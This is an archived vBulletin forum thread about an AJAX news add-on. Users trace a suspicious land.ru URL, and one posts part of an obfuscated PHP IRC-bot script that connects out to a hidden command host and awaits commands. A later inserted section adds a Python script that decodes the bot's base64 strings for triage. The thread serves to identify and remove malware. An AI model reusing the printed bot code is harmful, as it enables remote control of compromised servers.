vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vBulletin 3.6 Add-ons (https://vborg.vbsupport.ru/forumdisplay.php?f=194)
-   -   Miscellaneous Hacks - [AJAX] News/Announcements (https://vborg.vbsupport.ru/showthread.php?t=144414)

kylek 01-02-2008 05:29 PM

Now getting other script addresses in the database error:

http://www.xxxxx.xxx/forum/showthrea...ru/.html/body?

Same error different email in script:

http://www.xxxxxxx.xxx/forum/showthr.../.cache/index?

Uninstalling until this can be explained.

Ulf T 01-03-2008 10:35 PM

Quote:

Originally Posted by kylek (Post 1413960)
Still getting the same database error over and over, anyone else getting this?
Also what is the second address in the script? This - http://joioiskioeriyyskwkdwjsdfewis.land.ru/.html/body has nothing to do with our site.

I really don't know what it is. I just thought I would let you know I've also seen this address:

http://img217.imageshack.us/img217/7...ctivityyl9.png

I haven't installed this AJAX News hack, so I doubt that could have anything to do with it. But I maybe misunderstand you. Do you think the hack could be the reason why this strange URL gives you database errors? Because I don't get any database errors. I just see this address coming up in the activity list.

Ulf T 01-04-2008 09:43 AM

I tried the URL, and downloaded the file "body". I have a Mac, so I think it was fairly safe for me. I found a script inside it. It's too obfuscated for me to find out what it's doing. But I presume it's something evil. Here is a part of the beginning:
Code:

<? set_time_limit(0); ini_set("max_execution_time",0); set_magic_quotes_runtime(0); ini_set('output_buffering',0); error_reporting(0); ignore_user_abort();
$aec12e0af93cb5 = array ( "po" => 8080, "sp" => "uJijk4iVsIXRmQ==", "ch" => "aFaw", "ke" => "spd1iYSUqA==", "ha" => "dG1qQk1halK/nE6N", "pa" =>
"fpekVYhVdlWQXGLBXnBWWId1hll1WVWJVFpYh1tahVs=", "tr" => "*", "mrnd" => 9, "mo" => "cqtrig==", "ve" => "dmFyWA==" ); function tc8a89c2c306fb($m341be97d9aff9) {
$m341be97d9aff9 = str_replace(" ", "", $m341be97d9aff9); return $m341be97d9aff9; } function ob5d21085bf2c0($m341be97d9aff9) { $m341be97d9aff9 =
base64_decode(tc8a89c2c306fb($m341be97d9aff9)); return $m341be97d9aff9; } function rfc35fdc70d5fc() { global $aec12e0af93cb5; $see11cbb19052e = array();
$td707b8140a662 = ""; $b59b514174bffe =
array("sqytlpaKo4a/lI6MnaWIiI+zUYSvkA==","sqywiZKPpZLTk4zDmG6aiYakkZRuhpCR","rpihlYyTr5LWVKHDi6SRl0+jko4=","rZytgpFPr5TDlI7MmW6FiQ==","sKJuhYdPopDTi5bHlKVRhoY=","tWeuVFZSclfDVI7CVKKPmYasjI+lUYOJ","vaOokJFUbpPOi5jClLNRhoY=","sqywiZKPpVeMipjHlm6RiZU=","sqytlpaKo5eMipjHlm6RiZU=");
shuffle($b59b514174bffe); if(($j351a1d2ad68bc = fsockopen(jf9feaa9bcab30($b59b514174bffe[0]),$aec12e0af93cb5['po'],$k70106d0d82151,$d809b1abe3f111,15))) {
$m8052146769b14 = ad988971435842($aec12e0af93cb5['mrnd']); if (strlen($aec12e0af93cb5['sp'])>0) { q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UEFTUw==")."
".jf9feaa9bcab30($aec12e0af93cb5['sp'])); } q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("VVNFUg==")." ".gfb0daa8f01135($aec12e0af93cb5['mrnd'])." 127.0.0.1
localhost :$m8052146769b14"); q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14"); while (!feof($j351a1d2ad68bc)) { $f7fabc1404929c
= trim(fgets($j351a1d2ad68bc,512)); $h6e2baaf3b97db = explode(" ",$f7fabc1404929c); if(($f7fabc1404929c == $td707b8140a662)) continue; if
(isset($h6e2baaf3b97db[0]) && $h6e2baaf3b97db[0] == ob5d21085bf2c0("UElORw==")) { q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UE9ORw==")."
".$h6e2baaf3b97db[1]); } else if (isset($h6e2baaf3b97db[1]) && $h6e2baaf3b97db[1] == ob5d21085bf2c0("MDAx")) { q56eacb300613d($j351a1d2ad68bc,
ob5d21085bf2c0("TU9ERQ==")." $m8052146769b14 ".jf9feaa9bcab30($aec12e0af93cb5['mo'])); q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("Sk9JTg==")."
".jf9feaa9bcab30($aec12e0af93cb5['ch'])." ".jf9feaa9bcab30($aec12e0af93cb5['ke'])); } else if(isset($zdfff0a7fa1a55[1]) && $zdfff0a7fa1a55[1] ==
ob5d21085bf2c0("NDMz")) { q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14"); } else if (isset($h6e2baaf3b97db[1]) &&
isset($see11cbb19052e[$h6e2baaf3b97db[1]])) { unset($see11cbb19052e[$h6e2baaf3b97db[1]]); } else if (isset($h6e2baaf3b97db[1]) && ($h6e2baaf3b97db[1] ==
ob5d21085bf2c0("UFJJVk1TRw==") || $h6e2baaf3b97db[1] == "332")) { $n78e731027d8fd = strstr($f7fabc1404929c," :"); $n78e731027d8fd = substr($n78e731027d8fd,2);
$zdfff0a7fa1a55 = explode(" ",$n78e731027d8fd); $m67b3dba8bc677 = $h6e2baaf3b97db[0]; $v7c6483ddcd99e = explode("!",$m67b3dba8bc677); $v7c6483ddcd99e =
substr($v7c6483ddcd99e[0],1); $d73be252ca8221 = FALSE; if ($zdfff0a7fa1a55[0] == "\1".ob5d21085bf2c0("VkVSU0lPTg==")."\1") {

My guess is that they try to spread this link in order to trick people into downloading and executing this code.
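
Added example, not part of the original posts: a static triage of the snippet posted above, written in Python so the PHP is never executed. The posted helper `ob5d21085bf2c0` is plain `base64_decode` with spaces removed, so its string arguments can be decoded directly; values passed to `jf9feaa9bcab30` use a routine the excerpt does not show and are left untouched. `SAMPLE` holds shortened fragments of the post, and the Python function names are this example's own.

```python
import base64
import binascii
import re

# Decoder helper named in the posted snippet; its body there is
# base64_decode() applied after stripping spaces.
DECODER = "ob5d21085bf2c0"

# IRC client commands and numeric replies (RFC 1459 / RFC 2812).
IRC_TOKENS = {"PASS", "USER", "NICK", "PING", "PONG", "MODE", "JOIN",
              "PRIVMSG", "VERSION", "001", "332", "433"}

# Fragments shortened from the post above (not the full file).
SAMPLE = r'''
q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UEFTUw==")." ".jf9feaa9bcab30($aec12e0af93cb5['sp']));
q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("VVNFUg==")." ".gfb0daa8f01135($aec12e0af93cb5['mrnd']));
q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14");
if ($h6e2baaf3b97db[0] == ob5d21085bf2c0("UElORw==")) { q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UE9ORw==")); }
else if ($h6e2baaf3b97db[1] == ob5d21085bf2c0("MDAx")) { q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("Sk9JTg==")); }
else if ($h6e2baaf3b97db[1] == ob5d21085bf2c0("UFJJVk1TRw==") || $h6e2baaf3b97db[1] == "332") { }
'''

def decode_literals(php_source, decoder=DECODER):
    """Return [(literal, decoded_text_or_None)] for each decoder("...") call."""
    pattern = re.compile(re.escape(decoder) + r'\(\s*"([^"]*)"\s*\)')
    results = []
    for literal in pattern.findall(php_source):
        try:
            raw = base64.b64decode(literal.replace(" ", ""), validate=True)
            text = raw.decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            text = None  # not plain base64 text; leave for manual review
        results.append((literal, text))
    return results

def irc_indicators(php_source):
    """Decoded literals that are IRC commands or numerics, in order first seen."""
    seen = []
    for _, text in decode_literals(php_source):
        if text in IRC_TOKENS and text not in seen:
            seen.append(text)
    return seen

def looks_like_irc_client(php_source, threshold=3):
    """True when enough distinct IRC tokens are hidden behind the decoder."""
    return len(irc_indicators(php_source)) >= threshold

if __name__ == "__main__":
    for literal, text in decode_literals(SAMPLE):
        print(f"{literal!r:>16} -> {text!r}")
```

The decoded literals are the IRC client registration and keep-alive commands, which matches the `fsockopen` call to port 8080 in the posted code.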

VADOS 01-05-2008 06:49 AM

Uninstalled.

